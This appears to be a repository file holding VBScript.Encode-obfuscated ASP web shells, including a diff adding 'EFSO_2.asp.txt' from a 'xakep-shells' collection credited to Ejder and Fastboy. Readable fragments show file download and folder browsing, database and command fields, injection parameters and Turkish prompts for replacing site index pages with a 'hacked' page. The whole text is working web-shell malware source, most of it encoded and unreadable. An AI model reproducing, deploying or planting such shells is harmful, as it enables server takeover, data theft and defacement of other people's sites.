/RMkDnPr@!Ol(Vn@*@!YD@*@!Y9@*@!6GUY,0mmn'vCMkCVE~/bynxE B@*E,[E@!(@*r[~6W^N+MqDn:cwCY4P'~r@!z(@*JLJ@!JO[@*r@#@&d7d7rwP3DM 1!:8nMP'~T,K4+	@#@&d7idiI+kwKU/R	DbYn~r@!Y9~\mVkTUxB(lk+skUnE@*'x(dwp[U8kwi@!WKxOP6C1+xElMkl^B,dk.+xByB@*90l1nP~lþlMýsý@!z6W	Y@*P@!WKxOP6Cm'v	bxo[r	odB,jbyn{BlB@*@!4@*ü@!z(@*@!zwWUO@*@!zD[@*@!zYM@*E@#@&did72sd@#@&di7diIndaWxdnc.kDn,J@!DN,\l^kTU'E4C/VrUB@*LU4kwiLU8/ai@!0GxO~6l^+{vlMkCsEP/r"'v E~1WsKD{BDNE@*J,[~j;ldnv2DM f/mMr2YbW	#~[~E@!zWW	O@*@!zO[@*@!zO.@*@!&Ym8^+@*r@#@&ddidAUN,ko@#@&d77i2DM 1!:4.~',!@#@&7d77"+dwKU/Ros!/t@#@&id7dbo,:nDW9WP{Pr8D!YnJ,K4n	@#@&i7didZmssP:WaV;fnWmmn`6GV9+.(D+: 2mY4PL~r-EBJ(DED+rSr(Lo?}~/z(+DqCDMkWMme+	kg+dxnb@#@&7di72	N~rw@#@&77ixn6D@#@&d7Ax9P?!4@#@&dikoP:l8sP@!@*~KbYV~Ptx=In/2G	/nRq.kD+~EÇmwDC",|GxD.KVZ,ZH4+M?azPlP&PnW[~I+Y0r/bym~9+ðbþYbDrVrzKD RcE)"+d2Kx/n Ax[@#@&7i?;(P\WD^l:Gw^E9+6l^nv.+MrnmDlsnOD~;X8+.	mD.kK.{:W2s!|lOsblhkKU*@#@&idiks,ZH8+MCDMkG.|KWasEnlY^rC:bW	PxPEO/OJ,Ptx@#@&idd76	P3DMGMP]/!:+,1aY@#@&7didjnDPHKUIwP{~64NsUr MnOwWsN.`j+.rhlDChY.+*@#@&d7idU+Y,b	Cfbyrx^+.~{PHKUIwRU;8sKV9+./@#@&id7dUnY,ZGswkVndZPxPtG	InaRwkV/@#@&did7@#@&d77i0WM~+mmt,WGV9+MqO+h~bx~b	CfbyrU^+D@#@&id7dbo,:r9`:N~8vB+#,@!@*PrD E~:t+	lI/wKUd+cMkO+~E;X8+MjwHPX~JPZz8DRm.MkGMR}Dor)"n/aWU/R3U9@#@&i7did?O~KKYmVoWs[DdP{~r(Loj}RMnOwWsN.v0G^NDqD+s wmY4#@#@&77iddUnY,2l14oW^ND~'~PKYCVwGV9+.dc?E8oKV[+Md@#@&7ididI/aGxk+ MkOn,J@!DC4^+P(G.ND{JE!EE,mnV^dwmmrUT'JETrJ~ms^wC9Nbxo{JrTJrP@*J@#@&77idd@#@&diddihCk	ZH4nD	CMDrWMmb0YrWGkyrU,'~0Ks9+.&Y:RalD4PLPE-r@#@&7iddirs,Kl(snP@!@*,KrYsn,K4+	@#@&id77iI+d2Kxd+c]NrM+1YPrtDOw=z&hSh /H4+MRmDDbG.R}DTJ@#@&77id72	[Pbs@#@&idd77;X8+M	mD.bWM{5xbH+kxnR;W2zv:lbUZH4+M	CDMkKDmbVOb09k.rx*@#@&7idd7@#@&d7di7"+daW	/+cMrYPE@!DD@*@!DN@*@!8@*@!0W	O~0mm'vMnGMorlE~/bynxE B@*E,[~:mr	Zz(+MlMDbGD|bVYb09r.kx,'Pr@!z(@*@!zDN@*J@#@&77id7kw~2MD H!:4n.,'~!,P4+U@#@&iddidi]+kwGxk+ 	MkY~J@!YN,-CVbo	'v4CdVrxv@*Lx8dai@!WG	Y~0m^'vmDblVEPkry'v EP^G^WD{vh4kYv@*5mysl~k"UbP#lM@!z6WUO@*@!zO[@*@!&YM@*r@#@&ididdAVkn@#@&d7did7]/wKU/RMrO+,J@!Y[P-C^kLx{v4m/nsbx+v@*Lx8/aILx8kwp@!0KxD~0mmn'El.rmVB,dk.+'E+vP1W^W.'v]Nv@*ICysl~r.xk~eK3@!z6G	Y@*@!zDN@*@!zD.@*r@#@&did77AxN,rs@#@&di77dADMRHEh8D~',T@#@&d77idIndaWU/ wV;kt@#@&didi7@#@&d7didro,2l14sKVN. mKE	Y~@*~T,K4+	@#@&id77id:CdkmGxDC9W.,',!@#@&di7didWWMPnC1tPk;4al/DC~k	PAl^toG^NnD@#@&did77id:CdkmGxDC9W.,',:lk/1GxDl[WMPQ~8@#@&i7diddi/z4Dql.DrGM{)3Dr0Gk"r	P'~d!42lkOmR2mY4P[,J'E@#@&d7did77bsPsC/kmW	OCNKD,'~F~P4+U@#@&7did77idZz8D	lM.bW.|b0Yk6fb"k	0rxmV~x,ZX(nDqlDMrGD|b0Yr09r.kU@#@&7did77idwCO40rxms,'~kE(wlkYm wmY4@#@&d77iddi72MDRg;h4D,'~!@#@&id7di7diIndaWxdncssEk4@#@&7ididdi2	[Pbs@#@&id77idxaY@#@&di77di:m/dmGUDl[WM~',!@#@&idd77Ax[Pbo@#@&7ididkwPsrNvkhoB%S+*P@!@*~JmDJ,P4+	)"+dwGUk+ MrYPE/H4+.jaX~*,&,|G9PI+Y0kkry1+~fðkþOrMkVbzWMJ)"ndwKxk+ 2U[@#@&7di7d"+d2Kx/n qDrY~r@!&Dl(V+@*@!(.@*r@#@&did7U6Y@#@&di@#@&i77dU+DP\WU]w~',HWDtrUT@#@&77idj+D~zxCGk.kx^+M~',1GY4kUL@#@&di7dU+Y,/GVwk^+d!~x,1GY4rxT@#@&7id2sd@#@&di7iko,I;E/D sKDhR;W;UDP',TP:t+	@#@&didikoPhr9`PNBqvB b~@!@*PE. rPPtU=InkwKx/Rq.kD+~J;X8nM?wH~*,zP;z8+MOql.DrGMR6DTE)"+d2Kx/n Ax[@#@&7id7"+kwW	/ MkO+,Z	KmDlsnYM+@#@&77di@#@&d7d77"+dwKU/R	.bY+~E@!0GxD~6l^'rJlMkmsJrPdk.+xEr Jr@*@!(D@*@!8@*AMED+l@!&8@*KühPnslköD~-PbsO,|slkö.^+.,b^YýxmPbUN6~bDl.@!(D@*@!8D@*J@#@&77did"+dwGUk+ MrYPE@!(@*?rUTVn)@!&(@*~Ul9+mPzUl,`]WKYS~Shh*~fbyk	snDPbx[+a~mYCD,@!4M@*E@#@&dd77iIn/aG	/ncMkYPr@!4@*fG/Hl~)9ý)@!J8@*,f+6C;VDRm/2~~r	Nn6c4Ys~rU9+6 4D:sPTr(k~kYmxNmDD~&,fG/Hl~i.lxDýdýxý,rYKhCYb3,rsl.C0P)Ym.~,sC.0VýPrdb:~\~!yC	Yý,kVPGG/Hl~+0Vnh3PbdYD/Ury,bþmðýNC3r~rJ)VDnD	lOrwPfGdHl~b9ýErPF!Y!mEð!xm~5myýUJ@#@&77iddboP:l4^n~@!@*P:kOVn~:tnx=]+kwGUk+R	.bYnPrÇCaDC.PnWxDDKs",Zz4Dj2HP*,&PnWN,enY0kkk"mn~G+ðrþYb.k^kzGMRR E=In/aG	/nc2	N@#@&di7diIn/aWUdRMrYPJ@!WGDsPs+OtG[{JEwKdYrJ~C1YkGU{JEJ,',In$E/Yc?.\D#lMkC8^+/vE?;IqhPm1zHAJbP'~rgCmDrW	'hCk/[/z(+.m.MkGM{:Ww^EnCY^kC:{Zz8Dm.DbWD|9n0mmrFJE@*r@#@&di7diIndaWxdnc.kDn,J@!bxaEY,YH2+{JEtbN[n	JJ,Uls+'rE2lDtrJ~\Cs!+xJrEPLPP.b:`]n$En/D 5EnMXUYDbxTcJalOtr#b~LPJrE@*r@#@&i77dikwPPl8sP@!@*,PkDVn~:t+Ul"+dwKUk+ qDbY+,JnCDþý^lþOýDslsý~nWxD.W^"PInO3b/by~2.rþb: RcE)"+d2Kx/n Ax[@#@&7id7iI/wKxknRqDrYPE@!1+xDnD@*@!0KUOP6l1+xJECMkCVrEPkk"n{JJ+Er@*ul1VN~bx9+6,tDhV,|GN!)@!8M@*J@#@&diddi]n/aW	/nR	.bYnPr@!Y6OCM+l~^KVd'E{lB~MWS/'EFlvP	lh+{JE^KxYUYrJ@*@!&O+XYmDnl@*@!(D@*J@#@&did77bsPPC(VnP@!@*,KrDVPK4+	lI/2W	/n qDkDnPr|lMþýsCþYýM:mVý~|GUDDGVe~5YVrkky~3Mkþr:c cJl"+kwW	/ 2	N@#@&id77iI+k2W	/+c	.kD+,J@!4.@*zVO+MUlDko~GW/zC,kd:b~r@#@&ididd"+k2W	/nRqDrOPJ@!rxaEY,Ozw'rJO+aOrJ~xmh+{JE)^Y+.UmYrsbU9+arJ,\l^ExJrbsYDUCDksbUN6R4OhJr@*r@#@&d77idrs,Pl(Vn~@!@*PPrDVnP:4xl"+kwW	/ MkO+,JFCMþýVlþDý.:mVýPnGUYMW^"~5nO0kdk.~2MkþrhcRREl"+dwKUk+ Ax9@#@&idi7d"+dwKxdncDbO+,JP&U[+XVDnPtCMl.P7nDs+~E@#@&d77id]+k2KxdRqDkD+,E@!bx2EDPOza+'E^tm3(GaB,xm:n'vtmDCDjnDs+v~7lV;n{BTB@*@!(D@*r@#@&ddidirs,KC4^+~@!@*PKbOVPK4nU)"+kwGxdnc.kDnPr|C.þý^lþYý.hmVý~|KUDDG^",5+D3bdk.P3Dbþkh cRJ=]+kwW	dnRAx9@#@&d77id]+k2W	/n qDkOn,J@!k	2!Y~DXa+'rJMCNbWEJ,xCh'Jrhlk/WaOEJ,\mV;+xEr4.EDnJrP^4m3n[@*IGWD~7+~zVDP|^lkö.VD'x(/2ILx4k2iLx4k2IJ@#@&id7d7]/2W	d+c.rD+PE@!bx2ED~DX2'rJDmNbGJrPUls+xEr:lkdWaYJr~-l^E'EJdr	os+rE@*Ul[n1+P]GKY~|^CköDsD@!4D@*@!(.@*r@#@&did77bsP:C4^+P@!@*~KbY^+~K4n	)]+k2W	/n qDkOn,Je+DVb/r.PADkþb:c Rr)]+kwGUk+RAUN@#@&di77dbs,:rNcrsoS%B+#,@!@*~rlDE~:tnx=]/2Kxk+RqDbO+,J/X(+.jaXPl~z,|W9~e+D3b/ry^n,fnðkþDrDbVrzKDJl]/2W	dR3	N@#@&didi7I/2W	/n qDkDnPr@!k	2;Y,YHwn'EEkE8:bOJrP-C^E+xErKühPUrD+sDbPCmm0s+rJ@*@!JmnUD+D@*E@#@&ddi77I/aWU/n qDrY~J@!ZnUD+D@*E,[~JUnçbVn	PnVlköD9n3bPPü:,?rOV+MnP}YWsCOk0P_l^3n[,kUNaPzYC.rP[~E@!ZnxDnM@*E,[,J@!(D@*E@#@&d7did]nkwW	d+cDbOnPr@!J0GDh@*r@#@&di7diko~:l4sn,@!@*P:rDVn,K4+x=IdwKxd+c.rD+PrÇCwMly,FGxDDKVZP/z(+.?azPlP&~nWN~eYVkkr.mn,fðkþYbDbskHW.RcREl"+/aGxk+RAU[@#@&did7d@#@&id7di@#@&id77AV/n@#@&d7di7U+O,r(LsUr,xP;DnlD+68N+mDcJUmDb2Ok	ocsrVnjH/O+s64N+^Or#@#@&7id7daCDtH/	+KXY,xPd+WYv?n.7+Dc\lanlD4cI;!+dY jD-+M#lMkC8^+/cEUZ]qhP|1)t2r##Bq	dYMIn\v?n.7+Dc\lanlD4cI;!+dY jD-+M#lMkC8^+/cEUZ]qhP|1)t2r##BJ'E#*@#@&did77;O:Gw^ECm^VP{PalOtHnkxnKXOPLPE/qRtOhr@#@&di7idjY,1+kxP6DPxP}4%okWR}2+	K+XOok^+vZ	OPGaV;Cm^3BP+S,KD;nBPol^d#@#@&diddikw~Km4s+,@!@*~:kY^nP:t+	l]+kwKxd+ 	MkO+,EÇlaDC",|WUOMWs",/H4nM?aXPlPJ~|KN~5YVrkky1nPG+ðkþDr.k^kHW.R  r)]+k2W	/n AxN@#@&id7di-YGMNVk	tmdP{Pjw^kOc"+;!n/DRsK.h`rmKxO+UOr#S.(/Dd0b@#@&dd77isGD,r,'~ZP:WP`AK;x9`-+DW.[Vk	4lk#@#@&77didi1n/Un:6ORq.kD+Jr	+`-nDW.Nsbx4m/vk#*@#@&7did716O@#@&ddi7dU+Y,/z4Dql.DrGM{e+	r1/Un,'P68Nsjrc!YobV`ZqO:Gw^Eul13b@#@&ddi7d@#@&di77dbs,In;;nkY sK.:vJhCk/W2Or#~',EkkUTVJP:tU@#@&d7did7/mVV,PWaVEGnWl1+v.nDrKmDC:OD~Edbxosnr~64NoUrS;X(+DqlM.kKDm5xrH/xb@#@&ddi772^/koP]n$En/D sKDhcr:lddKwOJ*~{PE(D!Y+rP:4+	@#@&did77iZl^sP:Ww^;9+6l1+c.n.bnCDmh+DDnSr4D;OJSr(%w?6BZH4+Mm.DbW.{I+Urg+/	n#@#@&di77dAx9Prs@#@&id7dAUN,ko@#@&dd73	N~kw@#@&d7i@#@&ks,Km8VP@!@*,KrO^+P:4+	)Id2W	/R	DrOPEÇla.l.PFG	YDGseP/X(nM?2HPlPz,|K[PI+O3b/r"1+PGnðkþDkDbsrXKDcR Jl]/2W	d+c2U[idd77@#@&7dAU9Pj!4@#@&dikw~KMkh`"+5;/Yc}EDXUO.k	ovJ/X8nMCDMrWM{PGaVEFCDVrlsE*#~{PrY+kYr~K4+U@#@&d77U+Y,64Ns?}~xP;DlO+68N+^YvE?1Dr2DkxL wks+UzkYnsr(L+1Yrb@#@&d7dalO4g+/	nKXYP{~J+6Yv?nD-nMR\laKlDtc];EndDRj+M-D#mDbl4^+kcJUZ]qhKmHzH2rb#BqxkO.I\v?nD-nMR\laKlDtc];EndDRj+M-D#mDbl4^+kcJUZ]qhKmHzH2rb#BJ-rbb@#@&didrs~hbNcksL~R~+b,@!@*~EmDEP:4xl"+kwW	/ MkO+,J/z(+DU2X,*PJ~FW9PI+O3rdby^+,9+ðbþYr.bVkzGMJlIdaWUk+c2x9@#@&7dirslH1nd	+/b~',wlD4H+kxKaY~',J/:n/DRsGTJ@#@&7idrs,hbNc:NBFvB *~@!@*PED rPP4x)"n/aWxkn MkD+~J/z(+.?azPlP&~;X4n. CDMrKD }DTJ)"+k2W	/nRAx[@#@&ddij+DP1dU+:6DPxP68Nsjrc/DlOn:+6OobVn`}smXH/	+/b~:.E#@#@&id7jYP;z4Dm..kKD|5nxrH/U+,xP}4%oUrR!nDsrVc}VCH1/x/bb@#@&d7d;lss,}WMsl:Ww^;9+6l1+cIn2^l^+vPDb:c];EndDR}E.H?OMk	o`rwmOtr#b~ruESr-J*SJD+/DEb@#@&di2s/nrwPPDbh`"+5;/Y }!+.XUOMkUT`rZX(+M	lMDrWM{PGaVEnCY^klsEb#,',J/X8nMCDMrWM{9n6lmn6nJ~K4n	@#@&idiZl^V,tWMVCKKws;G+0m^+vI+asCm`:Dr:c];;+kORwW.hvJwCO4Jb#BE-JSr-r#~rZH8+MCDMkG.|f+6Cmr|rb@#@&idAx[Pro@#@&7Zmd+,2sd@#@&77;lsV,$KV;s?`A`*@#@&7d"+dwKxdncDbO+,?l(rOAm/^kVP'~~Wd?m8kDbsC	@#@&77;lsV,/H4nMmDDbWMmMKD;xDEsnUE4vb@#@&2x9~j+^+1Y@#@&ro,KC4^nP@!@*~PbYVn~:tnx@#@&"+daW	/+cI[kM+^Y,J4ODw)J&hShR;z8+MOql.DrGMR6DTE@#@&2U[,ks@#@&bs~:b[vK[BF+~ *P@!@*PrD EP:tnU=I+k2W	/+c	.kD+,J/X8nM?2X,XPJP/z(+DR	mD.kK.cr.TJ=I+kwKU/R3x9@#@&vbsPA.Dc1Es8nD,@!@*PTPP4x@#@&E]+kwGUk+R	.bYnPr@!(D@*@!0KxY,0m^+{BCDblsv,/k.n'E B@*uCYm),J~[~3MD 1!h4D~',J@!8.@*@!8D@*@!(@*E,[,jZm/c2MD f/^.bwYbGx*P[,E@!z(@*@!4.@*$rMPulDCP}V;þO!J@#@&v"+dwKUk+ qDbY+,J@!8D@*@!WW	Y~Wmm+{vlMkl^v~/by'v v@*_lOl=~J,[~3MDRH;s4nD,',J@!(D@*@!4M@*@!8@*,CCYmR  cP5m":mzr0;hl,k.xrPeG0@!&4@*@!4M@*E@#@&B2U[,ko@#@&@#@&InkwKx/Rq.kD+~+	N^G9+@#@&]+kwW	dnRqDbYnPE@!(D@*@!;nxD+.@*@!sWUO,sCmxEr	o9kxT/E~?byn'EGv~;WVK.P{PBwooswsE@*@!4@*~µ,@!&4@*@!zwWUO@*@!z/n	YnD@*E@#@&@#@&uJ9cAA==^#~@%>
diff --git a/xakep-shells/ASP/EFSO_2.asp.txt b/xakep-shells/ASP/EFSO_2.asp.txt
new file mode 100644
index 0000000..8d24d66
--- /dev/null
+++ b/xakep-shells/ASP/EFSO_2.asp.txt
@@ -0,0 +1,57 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%#@~^BgAAAA==vL[DMQIAAA==^#~@%>
+<%#@~^4BkAAA==@#@&B3w?}P2NN.PLP~sm/O8KXPDCDm0ýx9CUPHl.ýVhýþYý.~6W.PUC.UlF ;WH~ ,KÜ\P_)nS)"q,2L9+M~+,brYDYr.cOO@*@#@&EKÜH,u)|db"q~?)Fdq9q" R,|69dbI9),XCwm^mðýxhý.P(kD,Nðrþk0Vr3,|69!xPÇmsýþ:m:lkýUCPsl^PGV;.cP$E	[l	P[G^lXý~$bD~/K.!x~çý0lM/l,2x92"P'PUl#jz|R;GH,?WM;UV!P9+ðrV[rMR @#@&vA!PzC.ýVý:[C,onVbþObVhbþPDü:P4+MþnX,~~:mxOýVBPl^LWMkYsCSPHl.ýVýhVC.,?ýWýD9Cx,2%[DPOCMlWýx9C	Pzmyý^:ýþYýMR,P2tb~~,Nü"n	P\[+,MöDü	üh~sm/D4GX~C,brYDrDc@#@&v:b|JÝPd2Ý]1G3gPFzÇqgq1cP(zPA992"@#@&@#@&B2N[+MPhmd~CAIA@#@&@#@&vb0~D5E/Ocrl4^E*PxPrrk3GrPDt+	@#@&vD/2W	/n 1WW0r+k`JHndJ*P{PEFE@#@&B.+k2W	/n 1WWVr/cJHnkJbc+XwkM+k~',xGh3&X+@#@&BUN,k0,@#@&Bb0,xGY~.;;+kOR1WGVb+/cEH+dJ*~{PE8J,Ytx@#@&BM+dwKxdnchDbO+,J@!1nUYD@*@!8D@*@!(D@*@!(.@*I2OVbxPzG0R P@!8M@*@!(D@*4X,Ý/0GDakO6@!z^n	Y+M@*J@#@&BMndwKxk+ +U[v#@#@&Enx9PrW@#@&@#@&jD-+M Um.bwDKks+};Y,PxPF TT@#@&s!sValY4x.+aVmmn`]n$En/D ?D-nM.l.rm4s+kcrn):C|KIz1UJb:29J*~E&r~J'E#@#@&sbsnnmY4PxPhr9`oE^swmY4S&x?O."+-`w;^V2mY4~J'J*QF*@#@&sKV[nMnlD4P{PSWO`wE^V2lO4BqU?D.I\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j:j#q(I}!8 2**+G0,|OE@#@&mW	dY,3lMCVYD8'Eb$/G2oM_(9nS\H}np]j:j#oe\J@#@&mKx/DP0CDm3O+M xEm4m9n0TtkNVs:	Wa;./O;7haX.E@#@&NVCHkY~x,J@!tDh^@*@!4+mN@*@!YbOV@*3L9+.~G+x,VWM3~,;"l0P9E.R~Fmþýxhlc R@!zOrDV+@*@!Jtnl9@*@!4G9X@*@!mxDnD@*@!8D@*@!8.@*@!4M@*@!(D@*@!8.@*@!4@*A;Pj^Mk2YbUP:j\~4l3sCMk~2x9AI~PmkYbDc~j.+.k	Nn~}Xxmhl,XlkCVYbDcP@!z8@*@!4.@*@!8D@*@!8.@*@!4.@*@!4.@*@!8@*4z,2xf2"@!J8@*@!z^+	Yn.@*@!z(GNH@*@!J4O:^@*r@#@&NVCHkO ,xPr@!4OsV@*@!4l[@*@!ObYs@*(XPA9G3I@!zOkDVn@*@!ztCN@*@!4K[z@*@!mxO+.@*@!4.@*@!8D@*@!8.@*@!4.@*@!4.@*@!8@*A;,?1DkaY,rPnEsVmxhC,Cl0Vk	PXKV~lMYb3 Pe)klVVmUNbR ~,KÜDV~k+.\.,kU9lBPmK:cODBPLW7RO.,ok(rP0Vlök.~XmNmPdkOn,\CD,r/~~[bD+V~mVLýVmU9ýüýx[mPKYWslDr3,~~3!VsC	ý:ýxý.CPbyk	~-+M::n3On9k.R,i1`K\),3kS~(+UP(;,?^MkaYPbP:ü.3bXn:by~rçbx~B~Xm4l	^ýslMl,3CDþý~V!Vsl	sý:,NrzP5)t9ý: P@!&(@*~@!4M@*@!(D@*@!4M@*@!4M@*@!8M@*@!(@*4HP2x93I@!z(@*@!z^n	YnD@*@!z(W[z@*@!z4OsV@*J@#@&1WUkY,3lMl0O+M&xJZF+fW*vF0,r@#@&1GU/DP0l.lVOD*'rZ@$[^Y?Le`bR|_xU#,Y	N--=i@!@*~c_zr@#@&:mksmmDDmzP{PlM.CXvJHl4WGEBJ4WDhlbVESr:XUnDJSJThmksr~rtl13.J*P~Bö.+s~slk^s+MPXm.CYsl0PrçkUS,?Kbt~Nmx~VmçlDýhC0Prçk	 ,?n1EDkHPb~lþslVPbçkU~(XPABfAI@#@&;"l	Yb{CD.CHPxPm.DmXcE1W:ESrxnYrSr4r.JBJWMorSJTW-JBJ8.r~JbU0KJ#,@#@&Xm/m3ml..mX~',CDMlzcr2993"JSJU)j?)nJBJ5zMtiIr~EAÝ"f3\r~J(rD9+:rSEA&IG2\JSEwbjK~65r~Ejz.?)FcZ6HrSrZ6tR:IJBJV6.cK]J*@#@&hkkY~',J?m#jlnR;W\J@#@&GkhPwjr@#@&jnDPsj6,'~ZMnmYn}4N+mD`rjmMk2YbxL wkVjXkY+s68LmDJbP@#@&0WUEs~',K.rs`Dn5!+dYvE0WU!:r##@#@&sGNPxPM+5;/YvE:KN+rb@#@&wW^NnDKCDt+P{~D;;nkY`EoKV[+MKmY4yJ*[J'J@#@&kkVn:,'~.;EdYvJkksn:r#@#@&[+s~{P.+$;+kYcE9+VEb@#@&Wk^n,'~M+$E+kYvE0bVnJ*@#@&WKVN.P{PD5;+kYvJWWs[DE#@#@&Ym4sn,P'~];;+kOvJOm4^+J*@#@&rxN+^Y8P~x,I+$;+kY`rrULmDFE#@#@&bx%+1O ,Px~"+;;nkYcJbUN+^D r#@#@&k	%+1YfP,'~];EdYvJk	%nmD&r#@#@&rUN+^YW~P{P]n$E+dOvJrxNn1Y*r#@#@&k	L^YlP~',In5!+/DcJbxL^O*r#@#@&^:[VKN~P{~I;;nkY`E^sNVW9E*@#@&4l13+9P{~D;;+kYcE4lm0nNr#@#@&KCY4P{P.+5;/O`rKlDtEb@#@&E.s,'~D5!+dD`rED^J*@#@&1W;xDPx~M+;!n/D`J1G;xDJ*@#@&/r"PxPMn;!+dOvJ/r"Jb@#@&[(xCs+,'PM+$;+kYcJ94UCs+J*@#@&943m[rP{PM+5EndD`EN(Vl9kEb@#@&N8db0.+,x,Dn$E/YvJ98/b0.+r#@#@&LN./$VP{~.+$E/O`EnNNnDk5Vr#@#@&k+m~x,Dn;!nkYcr/mJ*@#@&i/DhNlPx~M+;!n/D`J`dnDsNlJb@#@&CMlqP{~D;;nkY`ECMlqJ*@#@&l.m ,'PM+$;+kYcJmDC+r#@#@&VF,'PMn5E/D`E3qE*@#@&3y~',Dn5!+/Ocr3+J*@#@&3f,',D+$EdYvJV&r#@#@&0cP{~D;EdO`r3WJb@#@&AmkOk	LP{P.n$E+dOvJAlbObxLr#@#@&:!D^~',J4YDwl&JhhS J@#@&mK[rxTP{P.+5;/O`r^W9kULr#@#@&[byrP{~M+5!+kY`rNb"kr#@#@&`/n.k:Nl~',D+$;n/D`rjd+.dsNXJ*@#@&klsO,'P.n$En/Dcr/C^Yr#@#@&tmdtyPxPM+5;/YvEtm/tyEb@#@&tm/4&~x,Dn;!n/D`E4m/tfE*@#@&tmd4c~{PM+;!+kO`rtC/4cEb@#@&tmdtlP',.n;!+kYcJ4CktXJ*@#@&4ld4+P'~.;;+kOvJ4m/4vJ*@#@&4lkt{P{P.n$E+kO`rtlk4{J*@#@&tC/40,'~D5E/Ocrtld4RJb@#@&4m/4OP{PD;!n/D`Etm/41r#@#@&4lktFZ~xPM+$En/OcrtC/4q!r#@#@&slN~x,J3sU6r@#@&@#@&b0P0W	;:,'~JrPO4x@#@&VW	E:,x~sKV9+.nCO4@#@&+^d+@#@&oG^N+.KmY4P{~0WU!:@#@&+	N,r0@#@&@#@&b0~hKN+,xPrFJ,O4+	@#@&sGV[nMnCY4~',Dn5!+/O 6W.:vEM+hKYJ#@#@&0Gx!:~',Dn5!+/D 0KD:vE.+sWD+E#@#@&x[PbW@#@&@#@&UKVkdO,'~smsk+@#@&wKwEaP{~smVd+@#@&@#@&b0PsGNP',E+J,WMPhW[n,'~J2EPKD~hKN+~x,J{J,GMPhKNP',JREPKD~:KNn~{PJ8J,WD,hGNP{PEF{E,W.PsGNPx~rF%E~KD~:K[Px,J8,J,WM~:KNnP{PE+ZJPK.PsWN~xPr 8J~W.~sW[+,xPr +E,WD~hKNnP{~r *rP,WD,:K[+,'~Jy*E~KDPsGNP',E+vrPKD~:G[PxPr+GrPG.,:W[n,'~Jy0rPGMPsWNP{~Jy,EPKD~hKN+,xPr&!r~GD,:KNnPx~r&qJ,GD,:G[P'~E2 EPK.,:G9+,'Pr&2EPKD~:KNn~{PJ2J,WD,hGNP{PE&0E,W.PsGNPx~r&,E~KD~:K[Px,JW!J,WM~:KNnP{PE*8JPK.PsWN~xPrcyJ~W.~sW[+,xPrcfE,WD~hKNnP{~rc*rPKDPsW9nP{PEclJ~GMP:K[+,'Pr11J,Y4+U@#@&2Kw;w,xP:D;n@#@&+U[,kW@#@&@#@&kW,:KN+,',EvrPOtx@#@&"+/aGxk+R~;W0D{K.En@#@&?nY,ok^Px~w?r !Yok^nv0r^+*@#@&"+k2W	/nR1WUOxYDzw'Jm22VbmmYrWU&6W.mRNKhUsKlNE@#@&In/aG	/ncb9NCl9nD,J/l1tnR1WxD.W^J~r2.k7lD+E@#@&]/2W	d+cb[[_+l[nMPEZKUD+UDOd+xTY4E~,srVc?r"@#@&"n/aWxkn b9N_+CNn.,J/W	O+	YR9b/wGdbYrW	EBPEmYDlm4:UYpPWk^+UCs+'r~[,sk^ Uls+@#@&]+d2Kxd+c$k	l.zqDkOn,Dnl9$bxCMXwkV`wrVcwCY4#@#@&U+Y,WP{P1KO4k	o=Pj+O~wksP{~1KY4r	o@#@&./2W	dRn	N@#@&+	N,r0@#@&@#@&b0~UKYPsGNP',EG39kMJ~Y4n	@#@&ZmsV,onsTkY@#@&x[PbW@#@&@#@&D/wKxknRSDrYPE@!DkY^n@*As?}~+RZPwW.PjCj?C|c/WtP@!&DkYsn@*J@#@&MnkwG	/RhMkDnPr@!h+Dl~4DYw n;!k\{EEZKxD+UYRPHwnJr~mKxOn	Y'EED+aYJ4D:spP1tlM/O'b/GOR%X1 ,Jr@*J@#@&Dd2W	/RADrOPE@!kOX^+@*E@#@&DndaWU/ SDrD+,J4KNH`:mDLk	)T2Xi0KUY /YHsn)	WM:CVIWKxOOkry)qTa6i^G^W.)[owsowsp0W	Y WlsksX=.n.9lxmSbMkl^I8l13TDGEU[ mGVK.)[&Cfm&lId1DGV^8mDR6l1+O1W^GD=P:&Z&TfZi/1.W^V4m.Rtbo4Vro4O mGVK.),aX[lN*[Ikm.W^s(l. /4lNKh ^W^W.),aq+8 FyI/1DW^s8lMO2NskL4DO^W^GD=P:fm&lfCp/^DKs^4CMOmDDKh ^W^W.),a1[ON,9I/1DW^s8lMODDCmVR1WsWMlP[&Cfm&lId1DGV^8mDR9lM3/4l9Gh mGVKDl~[&l2C&mi8r@#@&D/aWU/n SDrY~Jc3q`6WxOR6lhk^z=r	o9kxT/p~0KxOOkk"n=F*aai)J@#@&.n/aW	/nRA.bYnPr 3y	WG	YOWCsksX=	4[bxT/i,0KUY /ry)qXa6i)E@#@&D+k2Gxk+ch.kOn,JONPWW	YRdDXVnl	W.:msp0G	Y /k.+=q!a6ImKVG.=aswoswsi6GUY 0m:rVzlj+.NmUlBb.rmViNE@#@&.+k2KxdRSDkD+,ElPmGVKDl:A22A32pY+XORNmKDCYrG	)UW	ni)J@#@&M+/2G	/nRS.bYn,Jm)tK\.	1WsWM):*Zl!^i)J@#@&.n/aW	/nRA.bYnPrC)7kdrD+N`^KVGD=:A23A2Ai8r@#@&.+kwGxk+ AMkY~Jm)\bdrYN=tG\n.PmGVK.)[cTCZ+mINr@#@&DdaWUk+chDbY~Jbx2ED~E@#@&D+k2W	/+cA.kD+,J 38.D:SJ@#@&D/2G	/+ AMkO+,Ek+smD	4mm0LDKEUN=afT2!&ZImKVWMl:swswsoiWG	YR0mhk^Xl#DNCUm~)DbC^iWKxDO/bylFZwai7+.Obml^Rl^ko	lhk9N^+IP4nbo4Y=q%pP8GMN+.R^+WY=qa6~kW^kN,al[*9*[i,4G.9+D .kTtY=q26,/KVrN~:8 q 8+i,4G.9+DR8KYOWsl8wa,/KVk9P[q 8 q pP8GMN+MRYKw)82aPkW^k[P:X9*[*9I8r@#@&./wGUk+ hMrD+~rY6YmDC	(l^3TDG;	N)[q 8 FyI^W^WM):soowsoi6GxDOWCskVzlj+.NmUm~)MkmVi6W	OOkk"+=FT2Xi\.Ybml^RCVbo	)hk[[^+IP4nkTtOl8%i~8KD[+MR^+WD)8w6,/Ksk9P:FyF+qyiP(GD9+D .ro4Y=F26~dKVrN,:*9*[X9iP8GMNnD 8KYOK:=FwXPkGVbN~alNX[lNi,8WMN+MROWa)8waPdG^k[P[q 8 q+p8J@#@&M+dwKUk+ SDbY+,J@!&/DXs+@*J@#@&C7gHAA==^#~@%>
+
+<!--EFSO Ejder &  Fastboy tarafýndan yazýlmýþtýr for SaVSaK.CoM . TÜM HAKLARI Ejder e Aitttir.-->
